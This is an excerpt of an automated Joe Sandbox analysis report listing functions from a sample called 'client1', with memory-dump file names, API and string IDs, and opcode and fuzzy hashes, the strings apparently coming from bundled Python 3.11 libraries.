                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: f22c52d47cb846a99d8516e9592497de04618e9629921033cbc4078d7013c5f0
                                                    • Instruction ID: 37fc3ae25e8115673c7bbc5a6a23ea9830848b53a9daa0cc5fd778de02d78427
                                                    • Opcode Fuzzy Hash: f22c52d47cb846a99d8516e9592497de04618e9629921033cbc4078d7013c5f0
                                                    • Instruction Fuzzy Hash: DF3191B3A19BC5CAE7128F35E8513AEA764F789784F005125EECD12A59DF7CD186CB00
                                                    Function 00007FF79F63E508 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory
                                                    • String ID: :
                                                    • API String ID: 1611563598-336475711
                                                    • Opcode ID: 89ffee479c464830a404f371819462673addff3e4a0adbddceaf6599ad198d2e
                                                    • Instruction ID: a1c1ac3e35cef5dca5b2dffa328874262bdb24a07ee44c6fa033a46e3c123853
                                                    • Opcode Fuzzy Hash: 89ffee479c464830a404f371819462673addff3e4a0adbddceaf6599ad198d2e
                                                    • Instruction Fuzzy Hash: CC21E362A087C281EB30AB21D4542ADB3BBFB94B84FC54035C6AC43284DFBDE5498771
                                                    Function 00007FFBAA6F5B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: FreeMem_
                                                    • String ID: 0
                                                    • API String ID: 4096353137-4108050209
                                                    • Opcode ID: d571f0cc72055e077ceb28729aec96d86d77c2e813d1e087a2f476782c23c19f
                                                    • Instruction ID: 61a63859e4cbb3b7fa3bf7d2af84b68eb41bfe5a7c2d48ba76c2dbfba58c52a3
                                                    • Opcode Fuzzy Hash: d571f0cc72055e077ceb28729aec96d86d77c2e813d1e087a2f476782c23c19f
                                                    • Instruction Fuzzy Hash: 8E219FB2A197818AE7128F35E8113EE6764FB89B88F501175EE8D17B59DF3CD14ACB00
                                                    Function 00007FF79F622880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Error detected
                                                    • API String ID: 1878133881-3513342764
                                                    • Opcode ID: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction ID: 05cd645ff5f888422db5e4e7115e06dcb47c015c2c7129efa72a60483e0df11d
                                                    • Opcode Fuzzy Hash: 412921116a21d042ea7cc01f3b6226aa372ad23cfa1aaecee88db1efd33321aa
                                                    • Instruction Fuzzy Hash: 792153726287C291FA30AB20F4517EAA359FB84788FC05135EA9D47A95DF3CD205C751
                                                    Function 00007FF79F622770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: Message$ByteCharMultiWide
                                                    • String ID: Fatal error detected
                                                    • API String ID: 1878133881-4025702859
                                                    • Opcode ID: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction ID: 79b571e26da2bfd48c070471a7e58d0411b39622869149dfb16ba3604a0de879
                                                    • Opcode Fuzzy Hash: f7448773671dbda672e22a82cfe80c2e0aa70ed18289780b2b9e604a2b102c49
                                                    • Instruction Fuzzy Hash: 3C21B5726287C291EB30BB20F8517EAA359FB84788FC00135E69D47A95DF3CD205C751
                                                    Function 00007FFBAA709920 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    • valid values for rounding are: [ROUND_CEILING, ROUND_FLOOR, ROUND_UP, ROUND_DOWN, ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_05UP], xrefs: 00007FFBAA709992
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: CompareErr_StringUnicode_
                                                    • String ID: valid values for rounding are: [ROUND_CEILING, ROUND_FLOOR, ROUND_UP, ROUND_DOWN, ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN, ROUND_05UP]
                                                    • API String ID: 643742939-1015891402
                                                    • Opcode ID: 3a85d9e1c53251d2d086d4e1452605908b77564e48832262553d256ca4bda505
                                                    • Instruction ID: 56a934146c796bd700d179f01e826c3b81d6acb2e8e6affdcfcc0365bd522fea
                                                    • Opcode Fuzzy Hash: 3a85d9e1c53251d2d086d4e1452605908b77564e48832262553d256ca4bda505
                                                    • Instruction Fuzzy Hash: 8E1173A1B1AA42D1E611CF25E84006B7768FBC4B91F184171DD8E53768CF3ED847C750
                                                    Function 00007FF79F62EFB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFileHeaderRaise
                                                    • String ID: csm
                                                    • API String ID: 2573137834-1018135373
                                                    • Opcode ID: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction ID: 9d94cc3acb5f3c85cba13d30bb3129c537d7161fd2bf0c3510a608b2a8661950
                                                    • Opcode Fuzzy Hash: a9ac3328ea6075577af066dd04772514ea360050604432a87b0551bd96b2ca6b
                                                    • Instruction Fuzzy Hash: 6B115432618B8182EB219F25F5402D9B7A9FB88B94F584234EF9C47754DF3DD551C710
                                                    Function 00007FFBAB498900 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • PyType_IsSubtype.PYTHON311 ref: 00007FFBAB49893B
                                                      • Part of subcall function 00007FFBAB4936A0: PyErr_Format.PYTHON311 ref: 00007FFBAB4936D4
                                                      • Part of subcall function 00007FFBAB493710: PyThreadState_Get.PYTHON311 ref: 00007FFBAB493732
                                                      • Part of subcall function 00007FFBAB493710: PyErr_Fetch.PYTHON311 ref: 00007FFBAB49374A
                                                      • Part of subcall function 00007FFBAB493710: PyCode_NewEmpty.PYTHON311 ref: 00007FFBAB49375D
                                                      • Part of subcall function 00007FFBAB493710: PyFrame_New.PYTHON311 ref: 00007FFBAB493777
                                                      • Part of subcall function 00007FFBAB493710: _Py_Dealloc.PYTHON311 ref: 00007FFBAB49378E
                                                      • Part of subcall function 00007FFBAB493710: _PyErr_ChainExceptions.PYTHON311 ref: 00007FFBAB4937A3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_$ChainCode_DeallocEmptyExceptionsFetchFormatFrame_State_SubtypeThreadType_
                                                    • String ID: charset_normalizer.md.MessDetectorPlugin$reset
                                                    • API String ID: 1820948682-4122180197
                                                    • Opcode ID: e74373900b7c84a88a11a969e50a50432fe1c9e43874778d362feb55dab9bba0
                                                    • Instruction ID: 92d8e7da7829a3601ac525494456d94064c5d82c08aced0b4ef5afe837435fb7
                                                    • Opcode Fuzzy Hash: e74373900b7c84a88a11a969e50a50432fe1c9e43874778d362feb55dab9bba0
                                                    • Instruction Fuzzy Hash: 7D014BE0F4A50780FE569BBBE8811B917A5AF59BC0F44C436DC3D8B3B2DE2CE5918211
                                                    Function 00007FFBAA706C8C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFBAA706EB8: PyTuple_Size.PYTHON311 ref: 00007FFBAA706EEC
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsLong.PYTHON311 ref: 00007FFBAA706F17
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsSsize_t.PYTHON311 ref: 00007FFBAA706F68
                                                      • Part of subcall function 00007FFBAA706EB8: PyTuple_Size.PYTHON311 ref: 00007FFBAA706FA8
                                                      • Part of subcall function 00007FFBAA706EB8: PyMem_Malloc.PYTHON311 ref: 00007FFBAA706FB8
                                                      • Part of subcall function 00007FFBAA706EB8: PyLong_AsLong.PYTHON311 ref: 00007FFBAA707022
                                                    • PyMem_Free.PYTHON311(?,?,?,00007FFBAA706795), ref: 00007FFBAA706CE6
                                                    • _Py_Dealloc.PYTHON311(?,?,?,00007FFBAA706795), ref: 00007FFBAA706D06
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Long_$LongMem_SizeTuple_$DeallocFreeMallocSsize_t
                                                    • String ID: argument must be a tuple or list
                                                    • API String ID: 687260090-986076822
                                                    • Opcode ID: 684bd140da40fb6bb725d4fb9f439ad82f2867d5e4afc151041550d49d268306
                                                    • Instruction ID: ed53cd0ccb7678d2e731ae328038f0637fea2eddf22247db992215736e14586e
                                                    • Opcode Fuzzy Hash: 684bd140da40fb6bb725d4fb9f439ad82f2867d5e4afc151041550d49d268306
                                                    • Instruction Fuzzy Hash: 6201A7A1B0AB42D0EE069F32E52447BA6A9EF04FC0F0840B5DD1D17765DE7CE4438320
                                                    Function 00007FF79F63F00C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693036603.00007FF79F621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79F620000, based on PE: true
                                                    • Associated: 00000002.00000002.2693018203.00007FF79F620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693061814.00007FF79F64A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F65D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F660000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693083227.00007FF79F66C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693132419.00007FF79F66E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ff79f620000_client1.jbxd
                                                    Similarity
                                                    • API ID: DriveType_invalid_parameter_noinfo
                                                    • String ID: :
                                                    • API String ID: 2595371189-336475711
                                                    • Opcode ID: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction ID: f6a196918b46ec67a83ca2aae2117e4ea2a4506a7808c67bb6a2d9dc34037f39
                                                    • Opcode Fuzzy Hash: f8eec6a66f3a594e824ddea09938586a7cad5545a492e04bdbecb8d953b03adc
                                                    • Instruction Fuzzy Hash: 2601D42292C38286FB35BF74A8612FEA3A9EF44708FC41135D56C82285DF6CE544DA24
                                                    Function 00007FFBAA734C08 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa730000_client1.jbxd
                                                    Similarity
                                                    • API ID: String$Err_FromUnicode_
                                                    • String ID: no such name
                                                    • API String ID: 3678473424-4211486178
                                                    • Opcode ID: 0bad81046192c5090e63041fc1c0adfcc3ec090d4373e4d8dfd61f48ff6f657e
                                                    • Instruction ID: 8d0078e0cee045c82fe73d151d714c72f7907bfd586309b7d08ac67750d6ddc2
                                                    • Opcode Fuzzy Hash: 0bad81046192c5090e63041fc1c0adfcc3ec090d4373e4d8dfd61f48ff6f657e
                                                    • Instruction Fuzzy Hash: 080181B1B1AA46D6FA62AF31E8543B72368FF98B45F4100B1DF4E46754DF2CE1068630
                                                    Function 00007FFBAA70F310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693167366.00007FFBAA6F1000.00000020.00000001.01000000.00000016.sdmp, Offset: 00007FFBAA6F0000, based on PE: true
                                                    • Associated: 00000002.00000002.2693151925.00007FFBAA6F0000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693193696.00007FFBAA719000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693211520.00007FFBAA727000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693226656.00007FFBAA728000.00000008.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693243662.00007FFBAA729000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693259098.00007FFBAA72A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbaa6f0000_client1.jbxd
                                                    Similarity
                                                    • API ID: Object_$AttrDeallocString
                                                    • String ID: numerator
                                                    • API String ID: 1614008757-727639709
                                                    • Opcode ID: 664a8b7548da97a9f2b5951361a89b3c0fefd4217b97b667dadd7fb88e5588c0
                                                    • Instruction ID: 15594ea9c9f416fb4eb74f0bc11d1892bd108271b5d897f5c12926ef9892e346
                                                    • Opcode Fuzzy Hash: 664a8b7548da97a9f2b5951361a89b3c0fefd4217b97b667dadd7fb88e5588c0
                                                    • Instruction Fuzzy Hash: 87F082D1A0F742D0EE169F36E9540BAAADD9F48FD0B1C5071CD1D067A5DD2CE1878320
                                                    Function 00007FFBAB496EA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_is_current_word_bad' cannot be deleted$bool
                                                    • API String ID: 1450464846-604167972
                                                    • Opcode ID: 4c20456b68d317d2c4cbca0898148b87029a092011c9c4153aace44cb894d61d
                                                    • Instruction ID: fb2a361444706ce6de67299202a3caa9d883ae6db792dfcc49ee55cf593815a3
                                                    • Opcode Fuzzy Hash: 4c20456b68d317d2c4cbca0898148b87029a092011c9c4153aace44cb894d61d
                                                    • Instruction Fuzzy Hash: 3AF0FEF5F1B90695EE06DB3AD9950382660BB94764F94C635DD3C462F0EF2CD55A8300
                                                    Function 00007FFBAB496F30 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'SuperWeirdWordPlugin' object attribute '_foreign_long_watch' cannot be deleted$bool
                                                    • API String ID: 1450464846-232606992
                                                    • Opcode ID: b5cec1f117394d39fc31ee6f1dd59354be8a79629f02482bb79c64e661aa26c1
                                                    • Instruction ID: b5f6108eaf68be91df148414c618c1482f59e2a73841ecc2ad85364cee072a49
                                                    • Opcode Fuzzy Hash: b5cec1f117394d39fc31ee6f1dd59354be8a79629f02482bb79c64e661aa26c1
                                                    • Instruction Fuzzy Hash: 12F0DAE5E1A90681EA069B3AD9910386661BB94764FD48636DD3C462B0EE2CD9668300
                                                    Function 00007FFBAB497C40 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2695432092.00007FFBAB491000.00000020.00000001.01000000.00000014.sdmp, Offset: 00007FFBAB490000, based on PE: true
                                                    • Associated: 00000002.00000002.2695413787.00007FFBAB490000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695456347.00007FFBAB4A4000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695478650.00007FFBAB4AA000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                    • Associated: 00000002.00000002.2695501720.00007FFBAB4AE000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_7ffbab490000_client1.jbxd
                                                    Similarity
                                                    • API ID: Err_String
                                                    • String ID: 'ArchaicUpperLowerPlugin' object attribute '_buf' cannot be deleted$bool
                                                    • API String ID: 1450464846-2595685569
                                                    • Opcode ID: 736c2d593c1c46f3a8f69d3afae860479ba1fab34284d6c75ca516f4fa25d373
                                                    • Instruction ID: be380760e8aa529cf107eb014bb3be7ea2e48523fe9f7e544e9ecfd6895e11d7
                                                    • Opcode Fuzzy Hash: 736c2d593c1c46f3a8f69d3afae860479ba1fab34284d6c75ca516f4fa25d373
                                                    • Instruction Fuzzy Hash: FAF0FEE5E0B90681ED06DB3AD8D50782660BBA8760F94C635DD3D463F1EF1CD9968300
                                                    Function 00007FFBAA7325B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _PyObject_GC_New.PYTHON311(?,?,00000000,00007FFBAA732533), ref: 00007FFBAA7325B6
                                                    • PyObject_GC_Track.PYTHON311(?,?,00000000,00007FFBAA732533), ref: 00007FFBAA7325E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.2693290777.00007FFBAA731000.00000020.00000001.01000000.00000015.sdmp, Offset: 00007FFBAA730000, based on PE: true
                                                    • Associated: 00000002.00000002.2693275344.00007FFBAA730000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA735000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA792000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7DE000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E1000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA7E6000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693307504.00007FFBAA840000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693474597.00007FFBAA843000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                    • Associated: 00000002.00000002.2693491810.00007FFBAA845000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
